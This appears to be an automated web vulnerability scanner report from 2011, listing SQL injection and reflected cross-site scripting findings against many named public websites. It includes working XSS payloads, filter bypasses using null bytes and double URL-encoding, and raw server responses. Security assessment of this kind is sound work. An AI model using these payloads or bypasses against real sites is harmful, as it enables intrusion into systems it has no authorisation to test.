1.1. http://www.danscomp.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.danscomp.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: PHP/5.2.3 Set-Cookie: token=46438%3A1301758136%3A17778; expires=Sat, 09-Apr-2011 15:28:56 GMT; domain=dunhillvacations.com X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:28:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]... </a>]: message: Line 1: Incorrect syntax near '2011'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35 PHP Warning: mssql_query() [<a href='function.mssql-query'> ...[SNIP]... </a>]: message: Unclosed quotation mark before the character string ')'. (severity 15) in C:\Inetpub\www.dunhillvacations.com\wwwroot\includes\v3\token.php on line 35 PHP Warning: mssql_query() [<a href='function.mssql-query'> ...[SNIP]...
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: PHP/5.2.3 Set-Cookie: token=78142%3A1301758137%3A54898; expires=Sat, 09-Apr-2011 15:28:57 GMT; domain=dunhillvacations.com X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 15:28:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:47:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Connection: close Content-Type: text/html Content-Length: 33983
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> ...[SNIP]...
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 15:47:03 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 Connection: close Content-Type: text/html Content-Length: 33834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <head> <TITLE>IC.cz - webhosting zdarma, freehosting, PHP4, PHP5, MySql, PostgreSql, str.nky zdarma, blog, fotogalerie</TITLE>
...[SNIP]...
1.4. http://www.ifly.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.ifly.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<br /> <b>Fatal error</b>: Call to a member function execute() on a non-object in <b>/var/www/html/powertrip/classes/plug-ins/DatabaseWrapper.class.php</b> on line <b>118</b><br />
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<meta property="fb:admins" content="636240531" ...[SNIP]... <a href="http://likem.info/like/view/28997" class="fmllink">Illegal immigration is not a new problem, Native Americans used to call it 'White People'.</a> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <a href="http://www.likethislist.org/likes.php?t=257">The best things in life are either illegal, bad, or fattening.</a> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''google.com/search?hl=en&q='' LIMIT 1' at line 1 WITH SELECT * FROM @prefix@stat_referer_list WHERE re ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head><title>Email & PHP and MySql hosting. Free hosting and web mail.</title> <meta http-equiv="Content-Type" content= ...[SNIP]...
2. Cross-site scripting (reflected)
There are 113 instances of this issue:
2.1. http://www.4jobs.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.4jobs.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a5bb><a>48525712c9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/cs ...[SNIP]... zoneAlias=TR1_728x90_JS&r_sitepath=http://www.4jobs.com&r_partnerid=344072&r_partnersitename=4Jobs.com&t_pgid=213045580862436282&t_sn=/Default.asp&t_httph=www.4jobs.com&t_httpurl=/Default.asp&t_httpqs=5a5bb><a>48525712c9b=1&t_sgid=818312244230460616&t_ws=COLO-WEB06&t_ugid=590039464322416195&f_ip=173.193.214.243&ud=> ...[SNIP]...
2.2. http://www.4teachers.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.4teachers.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef252"><script>alert(1)</script>0c5510a2826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!--<meta http-equiv="Content-Type" content="text/html; charset=iso-88 ...[SNIP]... <a href="http://www.4teachers.org/?ef252"><script>alert(1)</script>0c5510a2826=1&lang=SP"> ...[SNIP]...
2.3. http://www.acne.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.acne.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c680--><script>alert(1)</script>bec67766067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.4. http://www.acne.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.acne.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ef7'-alert(1)-'876c9abe3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Acne.org - Acne treatment and community</title> <meta http-equi ...[SNIP]... <script type="text/javascript"> $(document).ready(function() { // highlight the current menu root, with css .current-menu $.fn.reverse = [].reverse; $('#acne-menu a[href$=?c8ef7'-alert(1)-'876c9abe3b9=1]').parents('li').reverse().eq(0).addClass('current-menu') }); </script> ...[SNIP]...
2.5. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.actionext.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c1f2"><script>alert(1)</script>fc560b7b08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ActionEXT: how to ad ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.actionext.com/?9c1f2"><script>alert(1)</script>fc560b7b08b=1&c5=&c6=&c15=&cj=1" /> ...[SNIP]...
2.6. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.actionext.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d24"-alert(1)-"4a4ebe7a9a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ActionEXT: how to ad ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "www.actionext.com/?23d24"-alert(1)-"4a4ebe7a9a5=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
2.7. http://www.adoption.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.adoption.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc391"><script>alert(1)</script>a33a5854b79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Adoption, International, Domes ...[SNIP]... <input type="hidden" name="page" value="http://www.adoption.com/?bc391"><script>alert(1)</script>a33a5854b79=1" /> ...[SNIP]...
2.8. http://www.adpost.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.adpost.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22c37"><script>alert(1)</script>1bc67eff4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 15:50:56 GMT Server: Apache Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <TITLE>Free Classifieds @ Adpost.com</TITLE> <!Se ...[SNIP]... <a href="javascript:window.external.AddFavorite('http://www.adpost.com/us/?22c37"><script>alert(1)</script>1bc67eff4a3=1', 'Adpost.com Classifieds - Free Classifieds ')"> ...[SNIP]...
2.9. http://www.allsubs.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.allsubs.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9fa"><script>alert(1)</script>02acd87532c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir=> <head> <title>Subtitles - Di ...[SNIP]... <a href="mailto:?subject=Check out this subtitles site&body=Check out this link : http://www.allsubs.org/?1b9fa"><script>alert(1)</script>02acd87532c=1"> ...[SNIP]...
2.10. http://www.arcamax.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arcamax.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cb6"><script>alert(1)</script>696fff07a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.11. http://www.betus.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.betus.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b38"-alert(1)-"6a2e71f8eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Sports Betting ...[SNIP]... <![CDATA[ /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="www.betus.com/default.aspx?d7b38"-alert(1)-"6a2e71f8eef=1" s.server="VM1-CERES02" s.channel="Welcome" s.pageType="" s.prop1="" s.prop2=""
2.12. http://www.biblestudytools.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.biblestudytools.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beeb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebcc61a5957b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beeb5"><script>alert(1)</script>bcc61a5957b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
2.13. http://www.blockbusterexpress.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.blockbusterexpress.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c35fa'-alert(1)-'6b6fbf09de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.14. http://www.boardofwisdom.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.boardofwisdom.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be11"><script>alert(1)</script>df9138e0d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.15. http://www.brainpop.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.brainpop.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aca9"><script>alert(1)</script>955b95f7adb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html > <head> <META HTTP-EQUIV="Content-Type" content="text/html; charset=UTF-8"> <META name= ...[SNIP]... <input type="hidden" id="refer" name="refer" value="/?5aca9"><script>alert(1)</script>955b95f7adb=1" /> ...[SNIP]...
2.16. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.chakpak.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643b6"style%3d"x%3aexpression(alert(1))"fe964d8e6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643b6"style="x:expression(alert(1))"fe964d8e6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='t ...[SNIP]... <a href="/find/movies/?643b6"style="x:expression(alert(1))"fe964d8e6a=1"> ...[SNIP]...
2.17. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.chakpak.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f008'%3b3986bdcbcd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f008';3986bdcbcd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script> <script type='t ...[SNIP]... dEmail() { alertme182531890_submitAlert(); var val=document.getElementById('alertme182531890_email_id').value; logServerFromClient('182531890|-1 eId: -1 eType: alert:SEARCH kw:?3f008';3986bdcbcd1=| email sent '+val);
}
function alertme182531890_isGoodEmail() { var val=document.getElementById('alertme182531890_email_id').value; if (val.match('@') && (val.match ...[SNIP]...
2.18. http://www.couponconnector.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.couponconnector.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e603f"><script>alert(1)</script>7d4e29b47fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="page" value="/?e603f"><script>alert(1)</script>7d4e29b47fd=1"> ...[SNIP]...
2.19. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.curezone.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfe7"><script>alert(1)</script>59cde8d3ac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.20. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.curezone.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94e09<script>alert(1)</script>45687e24cc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.21. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dafont.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8016"><script>alert(1)</script>5e7327fdc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab ...[SNIP]... <a href="/fr/?b8016"><script>alert(1)</script>5e7327fdc12=1"> ...[SNIP]...
2.22. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dafont.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 31e15><script>alert(1)</script>168c4a55ca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab ...[SNIP]... <div style="margin-left:140px;display:block;cursor:pointer;height:54px;background:#e6e6e6" OnClick=document.location.href="/?31e15><script>alert(1)</script>168c4a55ca4=1#top" class="tdn"> ...[SNIP]...
2.23. http://www.dailystrength.org/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailystrength.org
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21d7b"-alert(1)-"e44377d2817 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.24. http://www.ebgames.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ebgames.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17243'><script>alert(1)</script>45828464d03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><meta http-equiv="Con ...[SNIP]... <a href='/Profiles/Login.aspx?ReturnUrl=/?17243'><script>alert(1)</script>45828464d03=1' id='header_auth_actions' rel='nofollow'> ...[SNIP]...
2.25. http://www.farmersalmanac.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.farmersalmanac.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eadf"><script>alert(1)</script>960828df2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eadf\"><script>alert(1)</script>960828df2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/ ...[SNIP]... <input type="hidden" name="redirect_to" value="/?2eadf\"><script>alert(1)</script>960828df2e=1" /> ...[SNIP]...
2.26. http://www.finecooking.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.finecooking.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8d0dd-->f45e9519164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.27. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fxnetworks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e73"><script>alert(1)</script>b20e69dece1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.28. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fxnetworks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f81"-alert(1)-"6420fe2faa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.29. http://www.hotboysatplay.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hotboysatplay.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c750b"><script>alert(1)</script>54a9d6e31a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="http://www.hotboysatplay.com/categ.php?categ=HotBoysAtPlay_free&c750b"><script>alert(1)</script>54a9d6e31a2=1" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image33','','img/main_samples_up.gif',1)"> ...[SNIP]...
2.30. http://www.importantscore.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.importantscore.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ac6"><script>alert(1)</script>5e961b20767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org ...[SNIP]... <input type="hidden" name="return" value="/?59ac6"><script>alert(1)</script>5e961b20767=1"> ...[SNIP]...
2.31. http://www.jobcentral.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.jobcentral.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb07"><script>alert(1)</script>7bf12fb657b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
